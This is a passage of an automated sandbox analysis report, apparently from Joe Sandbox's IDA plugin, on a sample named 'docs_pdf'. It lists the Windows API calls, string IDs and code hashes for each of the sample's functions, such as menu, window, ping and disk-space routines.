                                      • Part of subcall function 00FB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB2036,?,00000000,?,?,?,?,00FB16CB,00000000,?), ref: 00FB1B9A
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FB20D3
                                    • KillTimer.USER32(-00000001,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FB216E
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00FEBEF6
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF27
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF3E
                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FB16CB,00000000,?,?,00FB1AE2,?,?), ref: 00FEBF5A
                                    • DeleteObject.GDI32(00000000), ref: 00FEBF6C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 641708696-0
                                    • Opcode ID: e0532ad3af1fcd6f6169c2ec613750743fda831323310f2c57cbc4f976e51110
                                    • Instruction ID: aaa39bc98801e11aec5c5f587acb1b29241ef230456a20e43d4dd9acac4c4f6b
                                    • Opcode Fuzzy Hash: e0532ad3af1fcd6f6169c2ec613750743fda831323310f2c57cbc4f976e51110
                                    • Instruction Fuzzy Hash: D261C135900A41DFDB75AF5AC948B6AB7F1FF40322F10851DE08396968C73AA881FF81
                                    APIs
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    • GetSysColor.USER32(0000000F), ref: 00FB21D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: 6544ed86d37fdac0db1aec329ad0f5a8012ed2a435ddc1970d48bf9d4da653de
                                    • Instruction ID: aa981407751460dde7eac93ef00cff052bc1a39f9c0f08f05613c8a7f303d907
                                    • Opcode Fuzzy Hash: 6544ed86d37fdac0db1aec329ad0f5a8012ed2a435ddc1970d48bf9d4da653de
                                    • Instruction Fuzzy Hash: EC41C231900144AFEB655F29E888BF93B65EB06331F184355FEA5CA1E6C7368C42EF61
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,0103F910), ref: 0101AB76
                                    • GetDriveTypeW.KERNEL32(00000061,0106A620,00000061), ref: 0101AC40
                                    • _wcscpy.LIBCMT ref: 0101AC6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 3896daabe2e233858e3b4ce2d5d57972ef70fd1bca66fed3e47819bc6ed61c24
                                    • Instruction ID: 226e2f6784ed64199e13f7c3d41a49ee88e70e03677c1f9d98f34787bdf16d6d
                                    • Opcode Fuzzy Hash: 3896daabe2e233858e3b4ce2d5d57972ef70fd1bca66fed3e47819bc6ed61c24
                                    • Instruction Fuzzy Hash: 36519F30208382DBC710FF19CC91AAEB7EAFF84700F44481EF5D6572A6DB399909DA52
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: 8d46ae2da2e3417618ed6e180b1d940199568f43db3866f5b050f49783554b55
                                    • Instruction ID: f1d2a1f2fbfa51cf183cb72f27fb771ffb277a83b57aef1f8419b5b49e61ee1a
                                    • Opcode Fuzzy Hash: 8d46ae2da2e3417618ed6e180b1d940199568f43db3866f5b050f49783554b55
                                    • Instruction Fuzzy Hash: B0412772A04205AFDB24AF36DC42FBA73F9EB44310F24446FE689D7242EE759905AB11
                                    APIs
                                    • _memset.LIBCMT ref: 010373D9
                                    • CreateMenu.USER32 ref: 010373F4
                                    • SetMenu.USER32(?,00000000), ref: 01037403
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01037490
                                    • IsMenu.USER32(?), ref: 010374A6
                                    • CreatePopupMenu.USER32 ref: 010374B0
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010374DD
                                    • DrawMenuBar.USER32 ref: 010374E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: 022cb5b7b54e4a50192d6f8f018396474f2c01b281226d0eeb6d527feffe5a10
                                    • Instruction ID: e2e6ee38d9115f0d3e30339a98406b1724dcaea9d88206b6feda7ed41266cbcd
                                    • Opcode Fuzzy Hash: 022cb5b7b54e4a50192d6f8f018396474f2c01b281226d0eeb6d527feffe5a10
                                    • Instruction Fuzzy Hash: 76414BB5A00209EFEB20DF68D844E9ABBF9FF49310F144069FA95A7350DB36A914CF51
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 010377CD
                                    • CreateCompatibleDC.GDI32(00000000), ref: 010377D4
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010377E7
                                    • SelectObject.GDI32(00000000,00000000), ref: 010377EF
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 010377FA
                                    • DeleteDC.GDI32(00000000), ref: 01037803
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0103780D
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01037821
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0103782D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: ed53daf0829aff73010647f08962eee25011aeae144481093bc245a5907fd67f
                                    • Instruction ID: 8ecbe0f028140f2f1ca96e7e2e83fc4709a7802654ac91ac5dde1d637c4fbb1a
                                    • Opcode Fuzzy Hash: ed53daf0829aff73010647f08962eee25011aeae144481093bc245a5907fd67f
                                    • Instruction Fuzzy Hash: 5D31AC75500116ABEF229F78DC08FDA3BADFF4D320F100215FA95A60A0CB36D811DBA1
                                    APIs
                                    • _memset.LIBCMT ref: 00FD707B
                                      • Part of subcall function 00FD8D68: __getptd_noexit.LIBCMT ref: 00FD8D68
                                    • __gmtime64_s.LIBCMT ref: 00FD7114
                                    • __gmtime64_s.LIBCMT ref: 00FD714A
                                    • __gmtime64_s.LIBCMT ref: 00FD7167
                                    • __allrem.LIBCMT ref: 00FD71BD
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD71D9
                                    • __allrem.LIBCMT ref: 00FD71F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD720E
                                    • __allrem.LIBCMT ref: 00FD7225
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD7243
                                    • __invoke_watson.LIBCMT ref: 00FD72B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction ID: 87a3a86357ebc61eb49d44d4b00245c87bc38ebc429ff295642f7bf85739ab65
                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction Fuzzy Hash: 9A71D871E04756ABD714BE79CC46B5AB3AAAF10320F18422BF514EB3C1F774E940AB90
                                    APIs
                                    • _memset.LIBCMT ref: 01012A31
                                    • GetMenuItemInfoW.USER32(01076890,000000FF,00000000,00000030), ref: 01012A92
                                    • SetMenuItemInfoW.USER32(01076890,00000004,00000000,00000030), ref: 01012AC8
                                    • Sleep.KERNEL32(000001F4), ref: 01012ADA
                                    • GetMenuItemCount.USER32(?), ref: 01012B1E
                                    • GetMenuItemID.USER32(?,00000000), ref: 01012B3A
                                    • GetMenuItemID.USER32(?,-00000001), ref: 01012B64
                                    • GetMenuItemID.USER32(?,?), ref: 01012BA9
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01012BEF
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012C03
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01012C24
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 2378fac3454f7766b534c3411e793559e1a83417215064bd54088c7c9ee3c9eb
                                    • Instruction ID: 9d8dfe9322e34aafc2d3d30669413b0eb962876a5ff653986f93f7c878e4d577
                                    • Opcode Fuzzy Hash: 2378fac3454f7766b534c3411e793559e1a83417215064bd54088c7c9ee3c9eb
                                    • Instruction Fuzzy Hash: 3961C67090024AAFEB21DF98D984DFE7BB8FB01304F244499EAC193249D73A9D45CB21
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01037214
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01037217
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103723B
                                    • _memset.LIBCMT ref: 0103724C
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0103725E
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010372D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 5f1b97a9cbca3a51cc05c58628b92faa31f1ed6985974e1b9f4619e66175a8db
                                    • Instruction ID: 22089ec3459cb740702f407c08f3ab9a520c6312d4a9d940f11be5ebc2d39848
                                    • Opcode Fuzzy Hash: 5f1b97a9cbca3a51cc05c58628b92faa31f1ed6985974e1b9f4619e66175a8db
                                    • Instruction Fuzzy Hash: E3619DB1900208AFEB20DFA8CC81EEE77F8FB49300F144199FA95E7291D775A945CB60
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01007135
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0100718E
                                    • VariantInit.OLEAUT32(?), ref: 010071A0
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 010071C0
                                    • VariantCopy.OLEAUT32(?,?), ref: 01007213
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 01007227
                                    • VariantClear.OLEAUT32(?), ref: 0100723C
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 01007249
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01007252
                                    • VariantClear.OLEAUT32(?), ref: 01007264
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100726F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: 32d5e2fc0e89249cd9eefef5e665a0a08169a36e49422c6cfcda05b4bc15b2d4
                                    • Instruction ID: b1cbc765b74ec675c59b66ee5f1656c69da5f592b841680b134072901c37c0a4
                                    • Opcode Fuzzy Hash: 32d5e2fc0e89249cd9eefef5e665a0a08169a36e49422c6cfcda05b4bc15b2d4
                                    • Instruction Fuzzy Hash: E7418035E0021AAFDF15DFA8D8449EDBBB9FF08340F008069F985A7251CB39A945CFA1
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • CoInitialize.OLE32 ref: 01028718
                                    • CoUninitialize.OLE32 ref: 01028723
                                    • CoCreateInstance.OLE32(?,00000000,00000017,01042BEC,?), ref: 01028783
                                    • IIDFromString.OLE32(?,?), ref: 010287F6
                                    • VariantInit.OLEAUT32(?), ref: 01028890
                                    • VariantClear.OLEAUT32(?), ref: 010288F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 834269672-1287834457
                                    • Opcode ID: ac308236890360dc19088e4bed8a4877bdaa9b6ba6ead7268b4a5635f730c765
                                    • Instruction ID: 2f330144d45c663f3d3fc4a1db3add82888b1f30bd03e86d23727111198d34c3
                                    • Opcode Fuzzy Hash: ac308236890360dc19088e4bed8a4877bdaa9b6ba6ead7268b4a5635f730c765
                                    • Instruction Fuzzy Hash: C061BF746083229FD711DF25D848B5EBBE8AF48714F04885EFAC59B291C7B4ED48CB92
                                    APIs
                                    • WSAStartup.WSOCK32(00000101,?), ref: 01025AA6
                                    • inet_addr.WSOCK32(?,?,?), ref: 01025AEB
                                    • gethostbyname.WSOCK32(?), ref: 01025AF7
                                    • IcmpCreateFile.IPHLPAPI ref: 01025B05
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01025B75
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01025B8B
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 01025C00
                                    • WSACleanup.WSOCK32 ref: 01025C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 23c55a708d8502bb64e763ca2903edfc3be87b25d7e905ab992b291d50f57d56
                                    • Instruction ID: c8271415657478811d124bb69aea15be1693b22857ab89541607a61a41d85285
                                    • Opcode Fuzzy Hash: 23c55a708d8502bb64e763ca2903edfc3be87b25d7e905ab992b291d50f57d56
                                    • Instruction Fuzzy Hash: 9251B2316043119FDB22AF25CC45BAABBE4EF49710F04895AF599DB291DB74E800CF46
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 0101B73B
                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0101B7B1
                                    • GetLastError.KERNEL32 ref: 0101B7BB
                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0101B828
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Error$Mode$DiskFreeLastSpace
                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                    • API String ID: 4194297153-14809454
                                    • Opcode ID: 4648aa99d59a515369699f0e6c4d0daeebe2e632b196156db88f4616b9715272
                                    • Instruction ID: 88253d1e993dfd25efc0e764572a442873eb43f40e252444cd8f91780e51127f
                                    • Opcode Fuzzy Hash: 4648aa99d59a515369699f0e6c4d0daeebe2e632b196156db88f4616b9715272
                                    • Instruction Fuzzy Hash: A0318135A002069FDB10FF69C885AFE7BF8FF44700F148069E981EB295DB799A46CB51
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 010094F6
                                    • GetDlgCtrlID.USER32 ref: 01009501
                                    • GetParent.USER32 ref: 0100951D
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01009520
                                    • GetDlgCtrlID.USER32(?), ref: 01009529
                                    • GetParent.USER32(?), ref: 01009545
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01009548
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: 400bcf88966765225ac92711d21b7cc6e3bd78fe742af94e97c51b17ee58938d
                                    • Instruction ID: 242bb1a2fe66169ad921b208823e996e10b5b43c033a850c85e2cbc621021e76
                                    • Opcode Fuzzy Hash: 400bcf88966765225ac92711d21b7cc6e3bd78fe742af94e97c51b17ee58938d
                                    • Instruction Fuzzy Hash: 6C21B274D00205ABDF05AF65CC95EFDBBA8EF59300F100159F5A1972E2DB7A55189B20
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 0100B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0100B0E7
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010095DF
                                    • GetDlgCtrlID.USER32 ref: 010095EA
                                    • GetParent.USER32 ref: 01009606
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01009609
                                    • GetDlgCtrlID.USER32(?), ref: 01009612
                                    • GetParent.USER32(?), ref: 0100962E
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01009631
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1536045017-1403004172
                                    • Opcode ID: ed310a44d1ac45ce421572b9ef813bc55332bd27ce4e26a338d19c0f68dfe0a3
                                    • Instruction ID: 2403ed57bd6e3daa8aad4fde7ee27cddbd6a1b5537a95047306adeed295d545f
                                    • Opcode Fuzzy Hash: ed310a44d1ac45ce421572b9ef813bc55332bd27ce4e26a338d19c0f68dfe0a3
                                    • Instruction Fuzzy Hash: C321C174D00204BBEF11AB65CC85EFEBBA8EF48300F004155F991972D6DB7A9519EB20
                                    APIs
                                    • GetParent.USER32 ref: 01009651
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 01009666
                                    • _wcscmp.LIBCMT ref: 01009678
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 010096F3
                                    Strings
                                    Memory Dump Source
